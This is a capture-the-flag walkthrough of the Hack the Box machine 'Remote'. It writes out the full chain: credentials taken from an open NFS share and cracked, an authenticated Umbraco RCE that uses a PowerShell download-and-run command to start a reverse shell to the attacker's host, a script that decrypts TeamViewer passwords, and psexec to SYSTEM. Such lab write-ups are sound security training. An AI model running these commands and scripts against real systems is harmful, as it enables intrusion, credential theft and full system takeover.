Hack the Box: Remote
What should I know in order to hack this box?
Release Date: 21-March-2020
Retire Date: 05 Sep 2020
OS: Windows
Base Points: Easy [20]
Prepared By: MrR3boot
Machine Author(s): mrb3n
What is the specialty of Remote?
Remote is an easy Windows machine that features an Umbraco CMS installation. Credentials are found in a world-readable NFS share. Using these, an authenticated Umbraco CMS exploit is leveraged to gain a foothold. A vulnerable TeamViewer version is identified, from which we can recover a password. This password has been reused for the local Administrator account, and using psexec with those credentials returns a SYSTEM shell.
What did I learn from this box?
- NFS enumeration (showmount) and mounting exports
- CMS exploitation (Umbraco 7.12.4 authenticated RCE)
- TeamViewer credential gathering (registry value + hard-coded AES key)
- Password reuse: the TeamViewer password works for the local Administrator over psexec
Enumeration
Nmap
I use nmap to do the work for me 😏
kali@kali:~$ nmap -sC -sV -oA scan 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-07 13:36 EDT
Nmap scan report for 10.10.10.180
Host is up (0.27s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 5m48s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-07T17:44:13
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 259.75 seconds
Things to look for in this Nmap scan
- FTP (21): anonymous login allowed
- HTTP (80): "Acme Widgets" site on Microsoft HTTPAPI
- RPC (111): rpcbind, advertising nfs and mountd
- SMB (139/445): message signing enabled but not required
- NFS (2049)
Why only them?
I asked myself the same question, but these are the only listening ports on this box, so every clue to move forward has to come from one of them.
Directory brute-forcing (dirb)
When I see port 80/tcp open, I go for directory brute-forcing and check every URL it turns up for clues. It is a tedious process, but believe me or not, most of the time I find really important stuff this way.
kali@kali:~$ dirb http://10.10.10.180/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Sep 3 13:55:00 2020
URL_BASE: http://10.10.10.180/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.180/ ----
+ http://10.10.10.180/about-us (CODE:200|SIZE:5441)
+ http://10.10.10.180/blog (CODE:200|SIZE:5001)
+ http://10.10.10.180/Blog (CODE:200|SIZE:5001)
+ http://10.10.10.180/contact (CODE:200|SIZE:7880)
+ http://10.10.10.180/Contact (CODE:200|SIZE:7880)
+ http://10.10.10.180/home (CODE:200|SIZE:6703)
+ http://10.10.10.180/Home (CODE:200|SIZE:6703)
+ http://10.10.10.180/install (CODE:302|SIZE:126)
+ http://10.10.10.180/intranet (CODE:200|SIZE:3323)
+ http://10.10.10.180/master (CODE:500|SIZE:3420)
+ http://10.10.10.180/people (CODE:200|SIZE:6739)
+ http://10.10.10.180/People (CODE:200|SIZE:6739)
+ http://10.10.10.180/person (CODE:200|SIZE:2741)
+ http://10.10.10.180/product (CODE:500|SIZE:3420)
+ http://10.10.10.180/products (CODE:200|SIZE:5328)
+ http://10.10.10.180/umbraco (CODE:200|SIZE:5328)
Take away from dirb
The /umbraco path means the site runs Umbraco CMS.
I found three different public exploits for it and none of them worked 😅
FTP
ftp-anon: Anonymous FTP login allowed (FTP code 230)
Let's log in to FTP as anonymous; the Microsoft FTP service accepts any e-mail-like string as the password for that account.
kali@kali:~$ ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
For now there are no files on the FTP server, and I couldn't upload anything either, so we can ignore this service for now.
Remote Procedure Call Information
Port 111 is open and running the rpcbind service. The nmap scan already lists the registered RPC programs and the ports they listen on. To confirm that and rule out false positives, query the portmapper directly with rpcinfo:
kali@kali:~$ rpcinfo -p 10.10.10.180
program vers proto port service
100000 2 udp 111 portmapper
100000 3 udp 111 portmapper
100000 4 udp 111 portmapper
100000 2 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 4 tcp 111 portmapper
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 tcp 2049 nfs
100005 1 tcp 2049 mountd
100005 2 tcp 2049 mountd
100005 3 tcp 2049 mountd
100005 1 udp 2049 mountd
100005 2 udp 2049 mountd
100005 3 udp 2049 mountd
100021 1 tcp 2049 nlockmgr
100021 2 tcp 2049 nlockmgr
100021 3 tcp 2049 nlockmgr
100021 4 tcp 2049 nlockmgr
100021 1 udp 2049 nlockmgr
100021 2 udp 2049 nlockmgr
100021 3 udp 2049 nlockmgr
100021 4 udp 2049 nlockmgr
100024 1 tcp 2049 status
100024 1 udp 2049 status
rpcinfo confirms that nfs (Network File System) and mountd are running on 2049/tcp. That is interesting: an NFS export that anyone can mount is a common way for credentials to leak.
NFS
It took me a day to learn about NFS. On Kali, install the client tools first:
sudo apt-get install nfs-common
Then list the exported shares (showmount asks mountd for the export list):
kali@kali:~$ sudo showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
The site_backups export is accessible to everyone (no client restriction in the export list), so any host that can reach port 2049 can mount it. Mount it with mount -t nfs into a local directory (here backups) and go looking for credentials. Umbraco.sdf is the SQL Server Compact database Umbraco uses when no full SQL Server is configured, and strings pulls the user-table rows out of it without needing a parser:
kali@kali:~$ cd backups
kali@kali:~/Desktop/backups$ strings App_Data/Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin"
The rows contain the back-office login admin@htb.local and its password hash b8be16afba8c314ad33d812f22a04991b90e2aaa, which the adjacent {"hashAlgorithm":"SHA1"} marker shows is a plain SHA-1 (40 hex characters, no salt). I looked the hash up in some public databases and crackstation.net had it: the password is baconandcheese. So the login credential is admin@htb.local : baconandcheese.
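An added Python example, not code from the original write-up, that parses the strings output above and verifies a candidate password offline instead of trusting a lookup site. The row text is copied from the write-up's output; the short word list in __main__ is constructed for the demonstration. Because the row says hashAlgorithm SHA1 and the digest is 40 unsalted hex characters, hashlib reproduces it directly; the same check scaled up is hashcat -m 100 against a real word list.

```python
#!/usr/bin/env python3
"""Extract the Umbraco back-office hash from a `strings Umbraco.sdf` dump and
verify a candidate password offline.

Added example for this write-up, not the post's own code. SAMPLE_STRINGS is
copied from the write-up's strings output; the word list in __main__ is
constructed. Umbraco 7 tags each membership row with a JSON blob naming the
hash algorithm; here it is an unsalted SHA-1, so hashlib reproduces it.
"""
import hashlib
import re

# Copied rows: strings loses the column boundaries, so username, e-mail, hash,
# algorithm marker, locale and GUID are glued together.
SAMPLE_STRINGS = """\
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
"""

# A hex SHA-1 is exactly 40 hex digits, and the algorithm marker that Umbraco
# writes right after it is the one reliable delimiter in the dump.
HASH_RE = re.compile(r'(?P<hash>[0-9a-f]{40})\{"hashAlgorithm":"(?P<alg>[^"]+)"\}')
# The audit-log rows quote the login cleanly: User "admin" <admin@htb.local>
LOGIN_RE = re.compile(r'User "(?P<name>[^"]+)" <(?P<email>[^>]+)>')


def extract_hashes(text):
    """Distinct (hex_hash, algorithm) pairs, in the order they appear."""
    found = []
    for m in HASH_RE.finditer(text):
        pair = (m.group("hash"), m.group("alg").upper())
        if pair not in found:
            found.append(pair)
    return found


def extract_logins(text):
    """Distinct (username, e-mail) pairs from the audit-log rows."""
    return sorted({(m.group("name"), m.group("email")) for m in LOGIN_RE.finditer(text)})


def digest(password, alg):
    """Hash a candidate the way the row says the stored value was made."""
    try:
        h = hashlib.new(alg.lower())
    except ValueError as e:
        raise ValueError(f"unsupported Umbraco hashAlgorithm {alg!r}") from e
    h.update(password.encode("utf-8"))
    return h.hexdigest()


def crack(hex_hash, alg, candidates):
    """First candidate whose digest equals hex_hash, or None if none match."""
    for pw in candidates:
        if digest(pw, alg) == hex_hash.lower():
            return pw
    return None


if __name__ == "__main__":
    # Constructed mini word list; a real run would stream rockyou.txt here,
    # or hand the hash to `hashcat -m 100` (raw SHA-1).
    wordlist = ["password", "admin", "Umbraco123", "baconandcheese"]
    for hex_hash, alg in extract_hashes(SAMPLE_STRINGS):
        print(f"[*] {alg} hash {hex_hash} -> {crack(hex_hash, alg, wordlist)}")
    for name, email in extract_logins(SAMPLE_STRINGS):
        print(f"[*] back-office login: {name} <{email}>")
```

The parser deliberately keys on the 40-hex-plus-marker shape rather than on column positions, because strings discards the SQL CE row structure; the login name comes from the audit-log rows, which are the only place the dump quotes it unambiguously.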
FOOTHOLD
We can log in to the Umbraco back office at /umbraco with admin@htb.local / baconandcheese. Clicking the Help icon in the bottom-left reveals that the CMS version is 7.12.4. This version suffers from an authenticated remote code execution vulnerability (the XSLT visualizer in the Developer section runs user-supplied XSLT, including embedded C# script blocks, on the server), for which a public exploit is available.
Let’s try the github way 😄
Since Umbraco 7.12.4 has an authenticated RCE, I searched GitHub for an Umbraco RCE exploit and its usage, found https://github.com/noraj/Umbraco-RCE and downloaded it. Then I downloaded the nishang reverse shell script Invoke-PowerShellTcp.ps1
from https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
which connects back to a netcat listener on our machine. I appended an invocation to the end of the script with my own IP address and port 5555.
Exploit Execution
First append this line to the end of Invoke-PowerShellTcp.ps1 so the script calls back as soon as it is loaded:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.179 -Port 5555
Start a Python HTTP server to serve the .ps1:
kali@kali:~/Downloads/Umbraco-RCE-master$ sudo python3 -m http.server 80
Start the netcat listener:
kali@kali:~/Downloads/Umbraco-RCE-master$ sudo rlwrap nc -nvlp 5555
listening on [any] 5555 ...
Run the exploit with the cracked credentials. The command it executes on the target downloads the script and runs it in memory:
kali@kali:~/Downloads/Umbraco-RCE-master$ python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.179/Invoke-PowerShellTcp.ps1')"
The listener gets the callback:
connect to [10.10.14.179] from (UNKNOWN) [10.10.10.180] 49764
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> cd ..
PS C:\windows\system32> cd ..
PS C:\windows> cd ..
PS C:\> ls

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/20/2020   1:13 AM                ftp_transfer
d-----        2/19/2020   3:11 PM                inetpub
d-----        2/19/2020  11:09 PM                Microsoft
d-----        9/15/2018   3:19 AM                PerfLogs
d-r---        2/23/2020   2:19 PM                Program Files
d-----        2/23/2020   2:19 PM                Program Files (x86)
d-----         9/7/2020  12:05 AM                site_backups
d-r---        2/19/2020   3:12 PM                Users
d-----        2/20/2020  12:52 AM                Windows

PS C:\> cd users
PS C:\users> ls

    Directory: C:\users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/19/2020   3:12 PM                .NET v2.0
d-----        2/19/2020   3:12 PM                .NET v2.0 Classic
d-----        2/19/2020   3:12 PM                .NET v4.5
d-----        2/19/2020   3:12 PM                .NET v4.5 Classic
d-----         9/7/2020   1:09 AM                Administrator
d-----        2/19/2020   3:12 PM                Classic .NET AppPool
d-r---        2/20/2020   2:42 AM                Public

PS C:\users> cd Public
PS C:\users\Public> ls

    Directory: C:\users\Public

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        2/19/2020   3:03 PM                Documents
d-r---        9/15/2018   3:19 AM                Downloads
d-r---        9/15/2018   3:19 AM                Music
d-r---        9/15/2018   3:19 AM                Pictures
d-r---        9/15/2018   3:19 AM                Videos
-ar---         9/7/2020   1:21 AM             34 user.txt

PS C:\users\Public> type user.txt
90af1f2df661f235f22caaaa5d6df686
Cool, that is the user flag, obtained while running as the IIS application pool identity.
Privilege Escalation
Reference: https://whynotsecurity.com/blog/teamviewer/
Having gained a foothold, we can now enumerate the host. Checking installed programs and running services reveals TeamViewer, and its version can be read from the binary:
(Get-Command "C:\Program Files (x86)\TeamViewer\Version7\TeamViewer.exe").Version
In vulnerable versions (CVE-2019-18988), user passwords are stored AES-128-CBC encrypted in the Windows registry, using a key and IV that are hard-coded in the TeamViewer binary: key 0602000000a400005253413100040000 and IV 0100010067244F436E6762F25EA8D704. The Metasploit post module post/windows/gather/credentials/teamviewer_passwords automates this from a meterpreter session; here we read the value straight from the registry in our PowerShell shell and decrypt it offline.
C:\> cd HKLM:\software\wow6432node\teamviewer\version7
HKLM:\software\wow6432node\teamviewer\version7> get-itemproperty -path .
StartMenuGroup : TeamViewer 7
InstallationDate : 2020-02-20
InstallationDirectory : C:\Program Files (x86)\TeamViewer\Version7
Always_Online : 1
Security_ActivateDirectIn : 0
Version : 7.0.43148
ClientIC : 301094961
PK : {191, 173, 42, 237...}
SK : {248, 35, 152, 56...}
LastMACUsed : {, 005056B99509}
MIDInitiativeGUID : {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion : 1
ClientID : 1769137322
CUse : 1
LastUpdateCheck : 1584564540
UsageEnvironmentBackup : 1
SecurityPasswordAES : {255, 155, 28, 115...}
MultiPwdMgmtIDs : {admin}
MultiPwdMgmtPWDs : {357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77}
Security_PasswordStrength : 3
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer\version7
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer
PSChildName : version7
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry

HKLM:\software\wow6432node\teamviewer\version7> (get-itemproperty -path .).SecurityPasswordAES
255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91
The value is 32 bytes, i.e. two AES blocks. After a bit of googling I put together this small Python script, which does the same thing as the Metasploit teamviewer_passwords module (it needs pycryptodome):
#!/usr/bin/env python3
# Decrypt the TeamViewer 7 SecurityPasswordAES registry value (CVE-2019-18988).
# Key and IV are hard-coded in the TeamViewer binary, so anyone who can read the
# registry value can recover the password. Requires: pip install pycryptodome
from Crypto.Cipher import AES

key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
# The 32 bytes printed by (get-itemproperty -path .).SecurityPasswordAES above
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174,
                    19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218,
                    126, 141, 55, 107, 38, 57, 78, 91])

aes = AES.new(key, AES.MODE_CBC, iv=iv)
# The plaintext is a UTF-16LE string padded out with null bytes: decode it as
# utf-16-le explicitly (plain "utf-16" guesses byte order) and strip the padding.
password = aes.decrypt(ciphertext).decode("utf-16-le").rstrip("\x00")
print(f"[+] Found password: {password}")
The script output reveals the password !R3m0te!. The TeamViewer password by itself doesn't provide us with elevated access, but passwords get reused: SMB (445) is open, so try it against the local Administrator account.
Using psexec module in msfconsole
use exploit/windows/smb/psexec
set RHOSTS 10.10.10.180
set SMBPass !R3m0te!
set SMBUser administrator
set LHOST tun0
exploit
This is successful: the service binary psexec installs runs as SYSTEM, and we can read root.txt on the Administrator's Desktop.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd ..
C:\Windows>ccd ..
'ccd' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows>cd ..
C:\>cd users
C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Users

02/19/2020  04:12 PM    <DIR>          .
02/19/2020  04:12 PM    <DIR>          ..
02/19/2020  04:12 PM    <DIR>          .NET v2.0
02/19/2020  04:12 PM    <DIR>          .NET v2.0 Classic
02/19/2020  04:12 PM    <DIR>          .NET v4.5
02/19/2020  04:12 PM    <DIR>          .NET v4.5 Classic
09/07/2020  01:09 AM    <DIR>          Administrator
02/19/2020  04:12 PM    <DIR>          Classic .NET AppPool
02/20/2020  03:42 AM    <DIR>          Public
               0 File(s)              0 bytes
               9 Dir(s)  19,159,539,712 bytes free

C:\Users>cd Administrator
C:\Users\Administrator>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\Administrator>dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Users\Administrator

09/07/2020  01:09 AM    <DIR>          .
09/07/2020  01:09 AM    <DIR>          ..
02/19/2020  04:03 PM    <DIR>          3D Objects
02/19/2020  04:03 PM    <DIR>          Contacts
02/20/2020  03:41 AM    <DIR>          Desktop
02/19/2020  05:26 PM    <DIR>          Documents
02/23/2020  02:22 PM    <DIR>          Downloads
02/19/2020  04:03 PM    <DIR>          Favorites
02/19/2020  04:03 PM    <DIR>          Links
02/19/2020  04:03 PM    <DIR>          Music
02/19/2020  04:03 PM    <DIR>          Pictures
02/19/2020  04:03 PM    <DIR>          Saved Games
02/20/2020  01:45 AM    <DIR>          Searches
02/19/2020  04:03 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  19,159,539,712 bytes free

C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>type root.txt
ee7491b9fbb1a1b6f6730c4ed1de0e6a
This is how I rooted the Remote HTB machine. I learnt a lot while hunting this box, and I hope you have learnt some new things from this walkthrough too. Thanks for reading. For any suggestion or query related to the walkthrough, feel free to use the comments section.